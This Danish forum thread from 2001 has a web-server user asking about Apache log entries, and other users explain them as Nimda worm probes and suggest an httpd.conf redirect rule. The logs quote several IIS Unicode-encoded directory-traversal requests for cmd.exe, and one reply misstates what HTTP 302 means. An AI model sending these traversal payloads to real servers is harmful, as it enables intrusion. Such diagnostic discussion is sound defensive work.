CIO Tech Eksperten IT-JOB IT-Kurser Events Podcast Søg
Cookie ikon
Avatar billede bpvk Nybegynder
07. november 2001 - 13:01 Der er 11 kommentarer

Apache

Hej jeg har lige installeret Apache på et win2000 system, og det er et HELT NYT område jeg her bevæger mig ind på, men jeg har da fået det til at virke, næsten, har lidt problemer med SSI.
Nå men mit spørgsmål drejer sig om Apache log filer
i filen access.log står der fx. følgende

:80.62.172.21 - - [07/Nov/2001:00:02:01 +0100] \"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 305

80.62.172.21 - - [07/Nov/2001:00:02:03 +0100] \"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 305

80.62.172.21 - - [07/Nov/2001:00:02:05 +0100] \"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 305

80.62.172.21 - - [07/Nov/2001:00:02:07 +0100] \"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 305

80.62.172.21 - - [07/Nov/2001:00:02:09 +0100] \"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 400 289

80.62.172.21 - - [07/Nov/2001:00:02:10 +0100] \"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 400 289

80.62.172.21 - - [07/Nov/2001:00:02:12 +0100] \"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 306

80.62.172.21 - - [07/Nov/2001:00:02:14 +0100] \"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 306

er der en der kan forklare mig hvad det betyder????

VH Bjarne
Avatar billede disky Nybegynder
07. november 2001 - 13:02 #1
enten er det en virus der forsøger at lave ulykker.

Eller en der forsøger at udnytte en virus som er kommet igennem.

Men det er kun et problem med en IIS server. Så du kan godt sove roligt om natten
Avatar billede vladimirr Nybegynder
07. november 2001 - 13:07 #2
Det er som disky siger en virus, i dette tilfælde er det med meget stor sandsynlighed Nimda der er på spil.

//Anders
Avatar billede vladimirr Nybegynder
07. november 2001 - 13:07 #3
Det den prøver på er at få adgang til din commandopromt for der at lave ulykker :(
Avatar billede jacobchr Nybegynder
07. november 2001 - 13:13 #4
Det er som disky skriver en virus der prøver på at komme ind på dit system.
Det er et eller andet \"fjols\" som ikke tjekker for virus på sin IIS.

Jeg sidder med stort set samme log-filer. Med omkring 100 forsøg her i weekenden (cirka 1000 hits).

Men du kan skrive dette i din http.conf fil;
RedirectMatch ^.*\\.(exe|dll).*
http://support.microsoft.com # (eller noget andet)

/jacob
Avatar billede jacobchr Nybegynder
07. november 2001 - 13:16 #5
Forklaringen på tilføjelsen er, at når en der bliver  tjekket om der findes en exe eller dll fil så sender du virusforspørselen et andet sted hen. Og du får fred.
Avatar billede bpvk Nybegynder
07. november 2001 - 13:32 #6
Forstår jeg det ret at det IKKE er på min computer der er virus, har tjekket for virus flere gange de sidste par dage, og har opdateret min virus, og ikke fundet nogen virus.
Skal jeg tilføje: RedirectMatch ^.*\\.(exe|dll).*
http://support.microsoft.com # eller kun: RedirectMatch ^.*\\.(exe|dll).* og hvor skal det stå i http.conf, (det kan godt være jeg spørger lidt dumt)
Hvad skal jeg gøre for at sikkere mig så det kun er mulig at læse min web-side, hvad skal jeg gøre så man fx skal bruge password for at oploade filer til web-siden.
Avatar billede kimrosgaard Nybegynder
07. november 2001 - 14:05 #7
det er en nyere variant af Nimda virusen der forsøger at lave et exploit mod din webserver. da du kører Apache har du intet at frygte da det kun er IIS der er sårbar over for den virus. hvis du samtidig kigger i din error.log vil du også se at de filer der er forsøgt adgang til, er fejlet da de ikke eksisterer.
læg iøvrigt mærke til tallet 404 i \"80.62.172.21 - - [07/Nov/2001:00:02:14 +0100] \"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 306\". 404 betyder som bekendt, at \"siden kan ikke vises\" :)
du har altså intet at frygte.
hvis du så min logfil, ville du korse dig når du så alle de angrem min server dagligt er udsat for :)
Avatar billede jacobchr Nybegynder
07. november 2001 - 14:08 #8
Det er rigtigt nok spom du skriver, at det ikke er din PC der har virus men en anden.

Hvis du skriver dette ind i din httpd.conf

RedirectMatch ^.*\\.(exe|dll).* http://127.0.0.1http://127.0.0.1/?You_Have_A_Virus_!!!

Lige under ServerName, så virker det.

/jacob

Avatar billede bpvk Nybegynder
07. november 2001 - 17:59 #9
Jeg prøvede at linke til det IP nummer der stod i log filen og uha straks poppede både firewall og antivirus programmet op med en advarsel om Nimda virusen, prøvede at finde ud af hvem der ejer pågældende IP nummer, men får bare at vide at det er TDC bredbånd bla.bla....
Hvor ser man iøvrigt hvad disse fejlkodenr. betyder.
Avatar billede bpvk Nybegynder
07. november 2001 - 19:07 #10
Jeg har tilføjet

RedirectMatch ^.*\\.(exe|dll).* http://127.0.0.1http://127.0.0.1/?You_Have_A_Virus_!!!

lige under ServerName i httpd.conf men problemet er det samme hvad betyder fejlkode 302???
Avatar billede jacobchr Nybegynder
07. november 2001 - 23:59 #11
AHHH fuck sorry taste fejl.
RedirectMatch ^.*\\.(exe|dll).* http://127.0.0.1/?You_Have_A_Virus_!!!

Koden 302 betyder at siden er fundet.

/jacob

Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
It-udvikling & AI kurser
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.
Se alle It-udvikling & AI kurser

Flere spørgsmål fra Webservere kategorien

Titel Indlæg Oprettet Seneste aktivitet
HTML-LINKS Af snestrup2000 i Webservere 2 16/11/202415:33 16/11/202418:41
Wordpress fejl Action Scheduler ? Af fimo i Webservere 2 24/10/202410:16 27/10/202412:07
My Cloud Home (hjemme server) Af Erik Hovedskou i Webservere 13 19/10/202419:51 20/10/202419:35
Periodisk lang responstid Af AlbertK i Webservere 3 23/08/202415:54 24/08/202421:48
Yousee Af nu_igen i Webservere 1 08/04/202408:21 09/04/202409:44
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester



Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I går 18:09 Billedoverførsel Af Laurids i iOS, iPhone & iPad
I går 13:30 Hvordan ændres UniFi Dream Machine UDM til switch mode Af Kasper4450 i Internetforbindelser
I går 13:01 Film går i stå midt i afspilningen Af ole falsted i Musik & videoafspillere
I går 11:40 Fjerne mappe i stifinder Af Peter Olsen i Andet software
I går 11:27 renteberegning Af Pil i Excel
White papers
Flere white papers »


Premium
Teaser billede
Vil købe tele-løsninger til det offentlige for 370 millioner kroner
Læs mere »
Efterspørgslen på AI-regnekraft er enorm - og det smitter af på priserne: "Vi kan sælge næsten alt, hvad vi får ind"
Nyt værtøj fra Microsoft: Snart kan du reparere nedbrudte Windows-enheder på distancen
Politiet skriver kontrakt på 75 millioner kroner med dansk it-firma: Medarbejdere skal flytte ind hos politiet
Se alle »
Computerworld
Teaser billede
Microsofts nye pc er ekstrem billig – men kan blive ekstrem sikker og fleksibel
Læs mere »
Test: Prøv kun disse B&O-hovedtelefoner, hvis du har råd
Kæmpe datalæk på hospital: 750.000 patienters fortrolige data lækket
Telegigant klar med AI-baseret mormor: Holder telefon-svindlere fast i røret med sniksnak og dumme spørgsmål
Se alle »
CIO
Teaser billede
Konsulenthus vil rulle Microsoft 365 Copilot ud til 200.000 ansatte
Læs mere »
Kæmpe-opgave for Danske Bank har banet vej for fuldautomatiseret migrering til cloud: Nu udbredes metoden i hele AWS
Microsofts store årlige event: De tre vigtigste nøglebudskaber fra Satya Nadella om Microsofts fremtid
Tre vigtige erkendelser, som Computerworld tog med hjem fra Gartners store topmøde i Barcelona
Se alle »
Job & Karriere
Teaser billede
Microsoft klar med ny direktion for den danske forretning: Her er de nye direktører
Læs mere »
Efter skelsættende møde med sportscoach: Stor dansk it-arbejdsplads indfører fredags-fri og isbade i arbejdstiden
Linus Torvalds giver russiske Linux-udviklere sparket: Vil ikke have noget med dem at gøre
Topchef Sara Green mener, at der er brug for et radikalt nyt syn på it-ledelse - særligt én ny trend hader hun som pesten
Se alle »
White paper
Teaser billede
Sådan får du overblik og beskytter dine cloudapplikationer
Læs mere »
SAP: Skab værdi og minimér omkostninger med effektiv dokumenthåndtering
Er din cybersikkerhed klar til AI-revolutionen?
Cyberstatus 2024: Her er truslerne – og her forbereder virksomhederne sig
Se alle »

Events
Flere events »
White papers
Flere white papers »
IT-Kurser
Se alle vores it-kurser »